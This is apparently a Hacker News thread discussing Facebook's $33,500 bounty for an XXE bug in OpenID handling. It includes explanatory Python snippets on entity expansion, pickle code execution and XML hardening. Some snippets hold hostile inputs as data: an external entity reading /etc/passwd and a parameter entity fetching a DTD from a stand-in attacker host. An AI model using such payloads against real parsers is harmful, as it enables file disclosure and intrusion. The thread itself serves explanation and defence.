We recently awarded our biggest bug bounty payout (facebook.com)
113 points by projuce on Jan 22, 2014 | 31 comments


XXEs are awful. You wouldn't think that simply by parsing an XML file (something so simple people are tempted to do it with regexes) you'd be invoking machinery that translates the XML language and binds it to, in effect, scripting language features. But that's what you're doing when you use common XML libraries!

For applications on mainstream stacks, if you accept XML inputs (explicitly accept them, that is; as in, invoke the XML parser yourself) and haven't taken the time to make sure you're not expanding entities, the safest bet is to assume that your XML parser has a "let inbound XML run shell commands" feature embedded into it. That's an oversimplification, but maybe not much of one.

This is a great, subtle finding. And Reginaldo handled it like a pro. Let the feeding frenzy for hiring Reginaldo Silva... commence! :)


I don't know if you read it, but I sent you an email about this same bug (when I originally found it in Drupal) in 2012. Didn't know FB was vulnerable back then. By the way, I learned a lot from you here on HN. So let me take this opportunity and say thank you very much.


I did! I responded to your first mail, too! :)

When I saw your name, it looked familiar, and I went and looked up your old mail. Great work! Congrats on an awesome finding.


So by default many XML libraries essentially allow remote code execution?

How in the world is that ok? How is that the standard?


Which platforms? Really, I am curious. I'm checking our XML processors and there is nothing there that could lead to execution of what is within the XML.

Are there examples somewhere I can see to understand how this is even possible?
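
As an illustration of the mechanism (a minimal sketch, not the Facebook exploit itself): entities are declared in the DTD and the parser substitutes them into the document. The snippet uses Python's standard library purely for demonstration, and the entity names and file path are made up. Only the harmless internal entity is parsed; the external variant is shown as data.

```python
import xml.etree.ElementTree as ET

# Internal entity: the DTD defines "greet", the body only references it.
INTERNAL = """<!DOCTYPE note [
  <!ENTITY greet "hello from the DTD">
]>
<note>&greet;</note>"""

root = ET.fromstring(INTERNAL)
expanded = root.text  # the parser substituted the entity on our behalf
print(expanded)

# External entity (hypothetical payload, shown as a string and never parsed
# here): the literal value is swapped for a SYSTEM identifier. A parser that
# resolves it would read that resource and splice it into the document.
EXTERNAL = """<!DOCTYPE note [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<note>&xxe;</note>"""
```

The point is that the text inside `<note>` never appeared there literally; the parser followed an instruction in the document. Whether the external form is resolved depends on the library and its configuration.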


Not just XML, JSON parsers are notoriously vulnerable as well.


Citation needed.

There have been many vulnerabilities in YAML parsers for ruby because they let you encode actual objects / code.

JSON, despite being "Javascript object notation", can't actually encode full code/objects. You only have a few datatypes: (off the top of my head) bools, strings, numbers, arrays, key/value dicts. None of these are dangerous or difficult to parse.

What you might be thinking about is the recent Ruby on Rails vulnerability which was caused by transforming JSON into YAML and then parsing the YAML. It would be more accurate to say the YAML parser was vulnerable.

Your claim that "JSON parsers are notoriously vulnerable" implies that this is a common occurrence as well, not just a single incident.

I personally don't see it as likely because JSON has pretty much no features compared to xml; the surface area is tiny.


Not exactly remote execution, but the parsing and construction of key/value dictionaries can be and has been exploited [1].

[1] http://arstechnica.com/business/2011/12/huge-portions-of-web...
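
Assuming the link refers to hash-collision denial of service (the URL is truncated, so that is a guess), the idea can be sketched with a toy key type. `CollidingKey` is hypothetical and forces every key into the same bucket. A real attack would instead craft strings that collide under the runtime's hash function.

```python
class CollidingKey:
    """Hypothetical key whose instances all hash to the same value."""

    eq_calls = 0  # counts equality checks performed by the dict

    def __init__(self, label):
        self.label = label

    def __hash__(self):
        return 0  # every key collides

    def __eq__(self, other):
        CollidingKey.eq_calls += 1
        return isinstance(other, CollidingKey) and self.label == other.label


def comparisons_to_build(n):
    """Build a dict of n colliding keys and return how many comparisons it took."""
    CollidingKey.eq_calls = 0
    table = {}
    for i in range(n):
        table[CollidingKey(i)] = i
    return CollidingKey.eq_calls


small = comparisons_to_build(100)
large = comparisons_to_build(200)
print(small, large)
```

Doubling the number of keys roughly quadruples the work, which is what turns a modest request body into a CPU sink. Nothing here executes attacker code, consistent with the "not exactly remote execution" caveat.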


Agreeing with the other statement: a JSON deserializer should never be executing arbitrary code as part of a feature of the deserializer. YAML, Python pickle, PHP serialization, etc. all allow serialization of arbitrary class instances by default, but JSON only allows simple data types.

So, no clue where you're getting that from.
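
The contrast can be sketched in Python (an illustration only; `Sneaky` and `only_plain_data` are hypothetical names, and the callable is deliberately harmless). JSON parsing can only hand back plain data, while a pickle may name a callable for the loader to invoke.

```python
import json
import pickle

# Whatever the input, json.loads builds its result from these types only.
JSON_TYPES = (dict, list, str, int, float, bool, type(None))


def only_plain_data(value):
    """Return True if value consists solely of JSON's basic types."""
    if isinstance(value, dict):
        return all(isinstance(k, str) and only_plain_data(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return all(only_plain_data(v) for v in value)
    return isinstance(value, JSON_TYPES)


parsed = json.loads('{"user": "x", "roles": ["a", 1, true, null], "n": 1.5}')


class Sneaky:
    """Hypothetical object whose pickle asks the loader to call something."""

    def __reduce__(self):
        # Harmless stand-in: instruct the unpickler to call len("four").
        return (len, ("four",))


blob = pickle.dumps(Sneaky())
result = pickle.loads(blob)  # the callable named in the data runs here
```

Here `result` is whatever the named callable returned, not a `Sneaky` instance. Swap `len` for something less friendly and loading untrusted data becomes code execution, which is the design difference the comment is pointing at.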


Examples like these are the reason why I like to avoid XML. Unless you're using something that actually takes advantage of the tree structure of XML and needs its features, it's really overcomplicated overkill that can bite you in the ass.

95% of the time you're just using XML like another JSON/serialization format and you should definitely be using something just as lightweight.


Hi HN, I'm the one who found the bug. My writeup is at http://www.ubercomp.com/posts/2014-01-16_facebook_remote_cod.... I'd be glad to answer any questions. I won't disclose the amount for now because I want to know what people think this would be worth, but eventually it will be disclosed. If you run an OpenID-enabled server, now is a great time to make sure your implementation is patched.


Facebook disclosed it in the comments (about a minute after you made this comment).



Ha. Clearly Facebook doesn't care about privacy.. I wonder if they even asked him first.


The way they disclosed it:

> Reginaldo agreed we could share the payout, it was $33,500 for this issue.


Apologies for assuming, based on how OP stated it, that he had full control over disclosure. I'd still prefer to hear from OP, as Facebook can say what they want or could be mistaken on the finer details of what was or wasn't agreed upon.


Did Facebook ask you if they could disclose it? Because they did disclose it.


The fact that Facebook is paying $33,000 for a remote code execution bug might be one of the big reasons that it's the biggest bug that's been reported to them.


I wonder whether the non-malicious applications of XML external entities outnumber the malicious applications.

Any HNers want to chime in with an account of actually using them for what they're meant for?


Any HNers want to chime in on XML <<used as an interchange format>> (for instance, as the payload format for a protocol) ever using entity definitions for any purpose?

Right now, I'd put money on "malicious uses" outnumbering "legitimate" uses.


I certainly haven't seen any.

This is a holdover from the SGML days, where this was a pretty important feature, and used quite frequently in many document formats required for government contracting. As I recall, there was lots of consternation about stuff that was thrown away from SGML when XML was built, but this external entity feature stuck.


The payment was apparently USD 33'500.


Yup, confirmed by Facebook on the linked blog post.

That seems like a nice chunk of money. I can't help but think about how much his exploit would be worth on the black market though. 10x that amount maybe? I have no clue.

Either way, being able to put a bug find like this on your resume is probably worth a lot more than those payouts.


/Leaving aside XML techno babble/:

>>> ... We knew we wanted to pay out a lot because of the severity of the issue, so we decided to average the payout recommendations across a group of our program administrators. As always, we design our payouts to reward the hard work of researchers who are already inclined to do the right thing and report bugs to the affected vendors. ... >>>

So, instead of awarding bounty to the researcher who found and intelligently handled the disclosure of the issue, Facebook "decided to average the payout" in order to keep part of the bounty to themselves, rewarding themselves for "hard work" and glorifying themselves for "awarding our biggest bug bounty payout ever" ?


I read it as "ask a bunch of our guys for what they think it's worth, and pay out the average of those recommendations", but I'd have expected that to be pretty standard practice for any serious & non-obvious case.


XXEs are nasty. Back in the early 2000s I found that every single Java RSS parser (back then that was an important thing) was vulnerable.

I submitted patches for them all, but it was kinda nasty to fix in Java, because each XML parser had different custom properties to set. https://github.com/rometools/rome/blob/master/src/main/java/... is the hackiness I had to do for ROME.


Fixing XXEs in Java is not a trivial thing to do. The best reference I know comes from Apache shindig [1], and you do have to make all those BUILDER_FACTORY.setAttribute calls, otherwise you block general external entities but allow parameter entities, which still leaves you vulnerable.

[1] http://svn.apache.org/repos/asf/shindig/trunk/java/common/sr...
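
To make the general-versus-parameter distinction concrete, here is a rough Python sketch (not the Shindig fix, and not Java). It lists every entity a document declares and flags which are parameter entities and which point at external resources. `audit_entities` and the sample URLs are hypothetical. Expat only reports the declarations here and fetches nothing.

```python
from xml.parsers import expat


def audit_entities(xml_text):
    """Return (name, is_parameter, is_external) for each declared entity."""
    found = []

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        # External entities carry a system identifier instead of a value.
        found.append((name, bool(is_parameter_entity), system_id is not None))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


# Declarations only; no entity is referenced, so nothing is expanded.
SAMPLE = """<!DOCTYPE d [
  <!ENTITY % param SYSTEM "http://attacker.example/evil.dtd">
  <!ENTITY general SYSTEM "file:///etc/hostname">
  <!ENTITY harmless "just text">
]>
<d/>"""

for entry in audit_entities(SAMPLE):
    print(entry)
```

A hardening step that only considers the general external kind would miss the first declaration, which is the gap described above.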


This was in PHP but the problem exists in most languages. For all of you Python programmers out there, check out defusedxml and use it. They have a good explanation of many of the dangers in XML parsing:

https://pypi.python.org/pypi/defusedxml
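
In the same spirit, a standard-library-only sketch of the bluntest defence: refuse any inbound document that carries a DOCTYPE at all. This is not defusedxml's API; `reject_doctype` and `DoctypeForbidden` are hypothetical names, and it assumes your interchange format never legitimately needs a DTD.

```python
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when an inbound document carries a DOCTYPE declaration."""


def reject_doctype(xml_text):
    """Scan xml_text with expat and raise if it declares a DOCTYPE.

    Custom entities can only be declared inside a DTD, so refusing the
    DOCTYPE refuses entity tricks wholesale.
    """
    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise DoctypeForbidden("DOCTYPE %r not allowed" % name)

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)


# Hypothetical hostile input: never expanded, rejected at the DOCTYPE.
HOSTILE = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""

BENIGN = "<data>hello</data>"

reject_doctype(BENIGN)  # passes silently
try:
    reject_doctype(HOSTILE)
    rejected = False
except DoctypeForbidden:
    rejected = True
```

Run the check before handing the text to whatever parser the application actually uses. A maintained library is still the better choice where one is available.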


If they went the NIH way and implemented the XML parsing themselves, this never would have been an issue.


What a silly comment.

Firstly, how can you be sure HN hasn't introduced the same, or a similar bug? Writing your own implementations does not make them secure.

Secondly, I don't understand why you are suggesting that people should always write their own implementations. Should I write my own servlet container rather than using Tomcat?


No, it's ironic in a way. Usually rewriting a standard piece of code is not so useful. In this case, if you wrote an XML parser, you'd probably skip over this part and end up secure.



